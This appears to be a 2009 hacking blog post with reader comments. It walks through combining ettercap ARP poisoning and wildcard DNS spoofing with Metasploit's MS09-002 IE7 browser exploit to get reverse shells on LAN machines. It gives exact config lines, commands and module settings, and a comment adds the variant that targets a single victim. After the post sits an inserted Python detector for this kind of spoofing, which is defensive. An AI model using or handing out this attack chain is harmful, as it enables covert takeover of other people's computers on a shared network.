Lol, in my last video I showed how to use the MS09-002 exploit, but there was a problem: the vulnerable URL has to be opened by the end user. How do we do that without sending them links, mailing them, or hosting the page somewhere? So I got an idea: DNS poisoning.
We use DNS poisoning to answer all of the end users' DNS requests with our own IP, so that whenever they open IE7 the browser lands on our port 80, where the exploit is listening, they get pwned, and we get a shell with the logged-in user's privileges.
Tools used: ettercap and MSFgui
1) Change the etter.dns config file of your ettercap tool to change the A records: remove everything under the A records and use
* A 192.168.147.128
(your IP). Your system is now acting as a DNS.
2) Go to a shell and type
ettercap -T -q -M arp:remote -P dns_spoof //
3) Now run MSF3 and choose exploits -> windows -> browser -> ms09_002_memory_corruption
4) Select your target, WindowsXpSp2
5) Use PAYLOAD windows_shell_reverse_tcp
6) Change SRVPORT to port 80, leave the remaining settings the same, and Apply
7) On the end-user side, once they open IE7 they are redirected to your port 80 and we get a shell
Below is the video, as usual:
http://blip.tv/file/1822479
WirelessPunter
think beyond the limit
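From the defender's side, the `* A` wildcard in step 1 leaves a clear trace: one client suddenly receives the same LAN address for many unrelated domains. The following Python check is an added example, not part of the original post; the log format (`client qname answer_ip`), the sample lines and the threshold are constructed assumptions.

```python
import ipaddress
from collections import defaultdict

# RFC 1918 ranges, listed explicitly (ipaddress.is_private covers more than these).
RFC1918 = [ipaddress.ip_network(n)
           for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed sample of DNS answers seen per client: "client qname answer_ip".
SAMPLE_LOG = """\
192.168.147.130 www.google.com 192.168.147.128
192.168.147.130 update.microsoft.com 192.168.147.128
192.168.147.130 www.yahoo.com 192.168.147.128
192.168.147.131 www.google.com 203.0.113.10
192.168.147.131 intranet.corp.example 192.168.147.10
192.168.147.131 wiki.corp.example 192.168.147.10
"""

def base_domain(qname):
    # Crude registered-domain approximation: keep the last two labels.
    return ".".join(qname.rstrip(".").lower().split(".")[-2:])

def find_wildcard_spoof(log_text, min_domains=3):
    """Return {(client, answer_ip): [base domains]} where one LAN address
    answered for at least min_domains unrelated domains."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 3:
            continue  # skip malformed lines
        client, qname, answer = parts
        try:
            ip = ipaddress.ip_address(answer)
        except ValueError:
            continue  # answer field is not an IP address
        if any(ip in net for net in RFC1918):
            seen[(client, answer)].add(base_domain(qname))
    return {k: sorted(v) for k, v in seen.items() if len(v) >= min_domains}

if __name__ == "__main__":
    for (client, answer), domains in find_wildcard_spoof(SAMPLE_LOG).items():
        print(f"ALERT {client}: {len(domains)} unrelated domains -> {answer}: "
              f"{', '.join(domains)}")
```

Internal hosts that share one address stay below the threshold because they collapse to a single base domain.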
February 27th, 2009 at 7:46 pm
You can get DNS spoofing working in Windows with Cain & Abel as well… then use the MSF GUI (also in Windows) to do the rest if you wished to not use Linux for whatever reason.
March 16th, 2009 at 6:25 pm
Thank you!
Very much!
May 13th, 2009 at 9:35 am
I love it! That is way cool man! The steps weren’t that complicated too, which is great.
June 8th, 2009 at 11:00 pm
Is there any way/command to DNS spoof only one machine? In the example above I don't like the idea of MASS DNS spoofing… I mean not all LAN computers. I want only one machine in the LAN to be the victim.
June 10th, 2009 at 2:47 am
Instead of
ettercap -T -q -M arp:remote -P dns_spoof //
use
ettercap -T -q -M arp:remote -P dns_spoof /IP
April 1st, 2010 at 5:31 am
Hm. Hope to see some more info. Can we speak about it?